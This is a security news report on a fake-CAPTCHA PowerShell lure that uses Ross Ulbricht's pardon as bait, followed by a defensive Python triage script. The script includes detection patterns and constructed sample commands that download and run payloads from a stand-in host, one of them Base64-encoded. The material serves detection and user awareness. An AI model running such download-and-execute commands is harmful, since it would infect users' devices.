Malicious actors on the platform X (formerly Twitter) are exploiting recent news about Ross Ulbricht to lure users into a fraudulent Telegram channel. Once there, victims are instructed to execute PowerShell commands, which infect their devices with malware.
The attack, uncovered by researchers at vx-underground, is a variation of the "ClickFix" social-engineering technique that is increasingly used to distribute malware. Classic ClickFix shows the victim a fake error and a "fix" that consists of running a command; here the attackers instead stage a fake CAPTCHA or account-verification step, and the code the victim runs is presented as the confirmation itself.
Previously, experts at Guardio Labs and Infoblox had reported a campaign in which users were prompted to run PowerShell commands disguised as CAPTCHA verification to prove they were not bots.
Ross Ulbricht, the founder of the infamous darknet marketplace Silk Road, serves as the bait in this campaign. Silk Road functioned as a hub for trading illegal goods and services. In 2015, Ulbricht was sentenced to life imprisonment, a punishment that sparked widespread debate over its severity. This week, Donald Trump fulfilled a previous campaign promise by granting Ulbricht a full and unconditional pardon.
Capitalizing on this event, the attackers created fake Ulbricht accounts on X and directed users to fraudulent Telegram channels masquerading as official portals.
On Telegram, the scammers orchestrate a sham verification process titled "Safeguard." It is driven by a Telegram mini-application that silently places malicious PowerShell code on the device's clipboard and then walks the user through pasting it into a Windows command line and running it, so the victim never types, and need not even read, the command being executed.
Upon execution, the command downloads and launches a PowerShell script that retrieves a ZIP archive from http://openline[.]cyou. This archive contains a malicious file, identity-helper.exe, which is suspected to act as a loader for Cobalt Strike. Cobalt Strike is a commercial adversary-simulation framework whose cracked copies are widely used by attackers to obtain remote access to systems and networks, commonly as the stage preceding ransomware deployment and data theft.
The attackers deliberately use sophisticated language and persuasive phrasing to ensure their victims remain unsuspecting.
Never execute a command copied from a website, chat or Telegram bot without first reading and understanding exactly what it does. Anything you cannot read is a red flag: Base64 blobs passed to -EncodedCommand, switches that hide the window or bypass the execution policy, and one-liners that download content and immediately execute it are the hallmarks of this kind of lure.
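The script below is an added example and is not part of the original report or of the vx-underground researchers' work. It does, for the attack chain described above and for the "read it before you run it" advice, what an analyst would otherwise do by hand: it takes a pasted PowerShell one-liner, or a Sysmon Event ID 1 process-creation record carrying one, decodes any -EncodedCommand blob, refangs report-style URLs (hxxp, [.]) and flags the components the lure depends on (a download cradle, in-memory execution, a hidden window, an execution-policy bypass, a dropped archive or binary). The indicator names, the lure.example hostnames and the three sample records are constructed for illustration; none of them reproduces the real campaign's command or script.

```python
"""Triage of pasted PowerShell one-liners for ClickFix / fake-CAPTCHA indicators.

Added example, not part of the original report. All samples, URLs and hostnames
below are constructed; lure.example uses a reserved test TLD.
"""
import base64
import re

# One pattern per lure component. The indicator names are my own.
INDICATORS = {
    "download_cradle": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
        r"net\.webclient|start-bitstransfer|curl|wget)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:hidden|h|1)\b", re.I),
    "policy_bypass": re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass\b", re.I),
    "archive_drop": re.compile(r"\bexpand-archive\b|\.zip\b", re.I),
    # Any .exe other than the shell itself, e.g. a dropped loader being started.
    "launch_binary": re.compile(
        r"\bstart-process\b|\b(?!(?:powershell|pwsh|cmd)\.exe)[\w-]+\.exe\b", re.I),
}
ENCODED = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL = re.compile(r"https?://[^\s'\"<>)]+", re.I)


def refang(text):
    """Undo the defanging used in reports (hxxp, [.], [:]) so URLs can be extracted."""
    return text.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def expand_encoded(command):
    """Replace a -EncodedCommand blob with its decoded text (PowerShell uses UTF-16LE).

    Returns (expanded_command, decoded_or_None)."""
    m = ENCODED.search(command)
    if not m:
        return command, None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return command, None
    return command[:m.start()] + "-EncodedCommand <" + decoded + ">" + command[m.end():], decoded


def triage_command(command):
    """Score one command line. Returns verdict, matched indicators, URLs and decoded payload."""
    text, decoded = expand_encoded(command)
    text = refang(text)
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        hits.append("encoded_command")
    # A fetch plus something that runs what was fetched is the lure's signature;
    # a lone hidden window or a lone URL only merits a second look.
    runs_payload = {"in_memory_exec", "launch_binary", "archive_drop"} & set(hits)
    if "download_cradle" in hits and runs_payload:
        verdict = "malicious"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": hits, "urls": URL.findall(text), "decoded": decoded}


# Parents a paste-and-run lure typically produces: explorer.exe is the Win+R Run box.
PASTE_PARENTS = ("explorer.exe", "windowsterminal.exe", "cmd.exe")


def triage_process_event(event):
    """Score a Sysmon Event ID 1 record (fields Image, ParentImage, CommandLine)."""
    result = triage_command(event["CommandLine"])
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    # The same command line under a scheduled-task or management-agent parent is a different story.
    result["paste_shaped"] = image in ("powershell.exe", "pwsh.exe") and parent in PASTE_PARENTS
    return result


# Constructed samples. STAGE1 models the fetch-unpack-run chain described in the article.
STAGE1 = (r"iwr http://lure.example/bundle.zip -OutFile $env:TEMP\b.zip; "
          r"Expand-Archive $env:TEMP\b.zip $env:TEMP\b; Start-Process $env:TEMP\b\helper.exe")
ENCODED_BLOB = base64.b64encode(STAGE1.encode("utf-16-le")).decode("ascii")
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {   # a Win+R paste of a fake-CAPTCHA command, URL defanged as it would appear in a report
        "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
        "CommandLine": "powershell -w hidden -ep bypass -c \"iex (iwr 'hxxp://lure[.]example/stage1.ps1')\"",
    },
    {   # the same shape with the cradle hidden behind -EncodedCommand
        "ParentImage": r"C:\Windows\explorer.exe", "Image": PS_EXE,
        "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED_BLOB}",
    },
    {   # benign administrative use: must not trip the verdict
        "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS_EXE,
        "CommandLine": "powershell.exe -NoProfile -Command Get-Date",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = triage_process_event(ev)
        print(r["verdict"], r["paste_shaped"], r["indicators"], r["urls"])
```

The verdict deliberately requires two components (a fetch and something that executes what was fetched) rather than any single hit, because `-w hidden` or a URL alone appears in plenty of legitimate administration; the `paste_shaped` flag is what distinguishes a user pasting into the Run box from the same command line launched by a management agent.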